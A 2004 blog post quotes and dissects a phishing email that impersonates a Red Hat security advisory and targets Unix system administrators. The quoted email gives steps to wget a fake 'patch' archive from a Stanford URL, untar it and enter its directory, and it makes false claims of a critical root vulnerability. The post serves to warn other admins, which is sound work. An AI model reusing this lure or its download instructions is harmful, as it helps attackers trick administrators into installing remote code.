Sven-S. Porst challenged me to talk about email encryption (PGP/ S/MIME, or something), and to suggest to 5 others that they do the same… I realize that you aren’t all Mac folk, but it’s reasonably straightforward in Thunderbird, Outlook, Evolution, and several other mailers, so hopefully you’ll give it a whirl.
Looks like phishers are even going after sysadmins. Very interesting… I got the following email last night, sent to my webmaster account:
Original issue date: October 20, 2004
Last revised: October 20, 2004
A complete revision history is at the end of this file.
Dear RedHat user,
Redhat found a vulnerability in fileutils (ls and mkdir), that could allow a remote attacker to execute arbitrary code with root privileges. Some of the affected linux distributions include RedHat 7.2, RedHat 7.3, RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only. It is known that *BSD and Solaris platforms are NOT affected.
The RedHat Security Team strongly advises you to immediately apply the fileutils-1.0.6 patch. This is a critical-critical update that you must make by following these steps:
- First download the patch from the Stanford RedHat mirror: wget www.stanford.edu/~joeio/fileutils-1.0.6.patch.tar.gz
- Untar the patch:tar zxvf fileutils-1.0.6.patch.tar.gz
- cd fileutils-1.0.6.patch
Again, please apply this patch as soon as possible or you risk your system and others` to be compromised.
Thank you for your prompt attention to this serious matter,
RedHat Security Team.
Copyright © 2004 Red Hat, Inc. All rights reserved.
Very credible looking, except for a few little niggles:
Received: from mail.forcartex.com.tw (unknown [22.214.171.124]) by samantha.freeke.org (Postfix) with ESMTP id A355FFC7C39 for email@example.com; Sat, 23 Oct 2004 03:11:53 -0400 (EDT)
Anyway, I thought this was notable — I’ve seen phishes like this targeted at Windows users, but this is the first I’ve seen specifically targeting ‘nix admins. One would assume that they just collected a bunch of webmaster addresses, figuring (probably correctly) that a fair number of those boxes would be running Redhat. The email shows an attention to detail -- the HTML links to Redhat's real logo, linked from a Redhat server, and they even ran their HTML through Tidy!
Let's be careful out there!
Fain would I climb, yet fear I to fall.
— Sir Walter Raleigh